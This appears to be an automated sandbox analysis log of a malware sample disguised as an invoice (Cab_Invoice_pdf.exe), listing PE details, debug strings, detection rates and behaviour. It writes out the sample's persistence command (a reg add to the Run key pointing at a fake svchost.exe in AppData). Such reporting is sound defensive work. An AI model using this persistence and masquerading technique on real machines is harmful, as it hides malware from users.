Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DADDA7C22_2_6DADDA7C
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAD927022_2_6DAD9270
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB055F922_2_6DB055F9
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB031E022_2_6DB031E0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB071C022_2_6DB071C0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB028A022_2_6DB028A0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB050C022_2_6DB050C0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0246022_2_6DB02460
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0745722_2_6DB07457
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0745922_2_6DB07459
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0A39822_2_6DB0A398
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0372922_2_6DB03729
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB04B6022_2_6DB04B60
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB036C022_2_6DB036C0
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB09E6D22_2_6DB09E6D
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: String function: 01317880 appears 36 times
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: String function: 01311860 appears 126 times
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: String function: 01318310 appears 88 times
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: String function: 01326046 appears 58 times
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: String function: 01311910 appears 68 times
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00BD6046 appears 58 times
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00BC1860 appears 126 times
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00BC7880 appears 36 times
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00BC1910 appears 68 times
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00BC8310 appears 88 times
Source: api-ms-win-core-handle-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.11.drStatic PE information: No import functions for PE file found
Source: Cab_Invoice_pdf.exeBinary or memory string: OriginalFilename vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exeBinary or memory string: OriginalFilename vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.569268710.00000000703DB000.00000002.00020000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.569019026.000000006F31E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepywintypes38.dll0 vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567548434.000000006EC21000.00000002.00020000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567452427.000000006EBF1000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelibsslH vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.569098530.000000006F340000.00000002.00020000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.569320710.0000000072F31000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.568654900.000000006EE48000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567155238.000000006EB1A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewin32gui.pyd0 vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567230692.000000006EB45000.00000002.00020000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.566773964.000000006E7D1000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepython38.dll. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.566980302.000000006E909000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.568866175.000000006F2E9000.00000002.00020000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.568948486.000000006F2F6000.00000002.00020000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567295169.000000006EB63000.00000002.00020000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.569160937.0000000070286000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.567064488.000000006EAEB000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewin32api.pyd0 vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exe, 00000003.00000002.568756682.000000006F2D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamewin32event.pyd0 vs Cab_Invoice_pdf.exe
Source: Cab_Invoice_pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeSection loaded: python3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: python3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: python3.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"
Source: Cab_Invoice_pdf.exeVirustotal: Detection: 62%
Source: Cab_Invoice_pdf.exeMetadefender: Detection: 33%
Source: Cab_Invoice_pdf.exeReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile read: C:\Users\user\Desktop\Cab_Invoice_pdf.exeJump to behavior
Source: Cab_Invoice_pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Cab_Invoice_pdf.exe "C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeProcess created: C:\Users\user\Desktop\Cab_Invoice_pdf.exe "C:\Users\user\Desktop\Cab_Invoice_pdf.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeProcess created: C:\Users\user\Desktop\Cab_Invoice_pdf.exe "C:\Users\user\Desktop\Cab_Invoice_pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe""Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122Jump to behavior
Source: classification engineClassification label: mal72.evad.winEXE@19/204@7/4
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA74150 _Py_NoneStruct,PyArg_ParseTuple,?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z,PyEval_SaveThread,GetDiskFreeSpaceW,PyEval_RestoreThread,?PyWinObject_FreeWCHAR@@YAXPA_W@Z,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,Py_BuildValue,19_2_6DA74150
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01314860 GetLastError,FormatMessageW,1_2_01314860
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeMutant created: \Sessions\1\BaseNamedObjects\mutex_var_xboz
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA7A5B0 PyArg_ParseTuple,?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z,?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z,?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z,?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z,FindResourceExW,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,SizeofResource,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,LoadResource,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,LockResource,?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z,PyBytes_FromStringAndSize,?PyWinObject_FreeResourceId@@YAXPA_W@Z,?PyWinObject_FreeResourceId@@YAXPA_W@Z,?PyWinObject_FreeResourceId@@YAXPA_W@Z,19_2_6DA7A5B0
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
Source: Cab_Invoice_pdf.exeStatic file information: File size 7399848 > 1048576
Source: Cab_Invoice_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Cab_Invoice_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Cab_Invoice_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Cab_Invoice_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Cab_Invoice_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Cab_Invoice_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Cab_Invoice_pdf.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Cab_Invoice_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.428528477.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.433779342.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: svchost.exe, 0000000B.00000003.389747907.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566821598.000000006E801000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.461345666.0000000002B00000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.489294757.0000000003600000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.394749545.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.398010798.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393554815.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567499040.000000006EC0E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.391481591.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.412809412.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.425322367.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.435730972.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: d:\agent\_work\9\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569291136.0000000072F21000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.386396710.0000000000E28000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.485296621.0000000070131000.00000020.00020000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\pywintypes.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568991542.000000006F30E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.396174179.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.418168798.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.410176305.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.423854182.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: svchost.exe, 0000000B.00000003.455016271.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393935792.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32api.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567031750.000000006EADF000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.401443735.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.392740878.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Cab_Invoice_pdf.exe, 00000003.00000002.568469462.000000006EDAC000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449130672.0000000002B7A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482692912.000000000377A000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32api.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567031750.000000006EADF000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.464053217.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567266133.000000006EB5E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.387226711.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.394362827.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569245523.00000000703D3000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.387736451.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.421932016.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: svchost.exe, 0000000B.00000003.386815953.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32gui.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567116932.000000006EB0B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.467080000.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
Source: Binary string: ta.pdb source: Cab_Invoice_pdf.exe
Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.462814052.0000000002C05000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.490361561.0000000003705000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567385268.000000006EBD0000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdbUGP source: Cab_Invoice_pdf.exe, 00000003.00000002.566821598.000000006E801000.00000020.00020000.sdmp, svchost.exe, 0000000B.00000003.461345666.0000000002B00000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.489294757.0000000003600000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.405860680.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569068056.000000006F339000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.391001556.0000000000E28000.00000004.00000001.sdmp
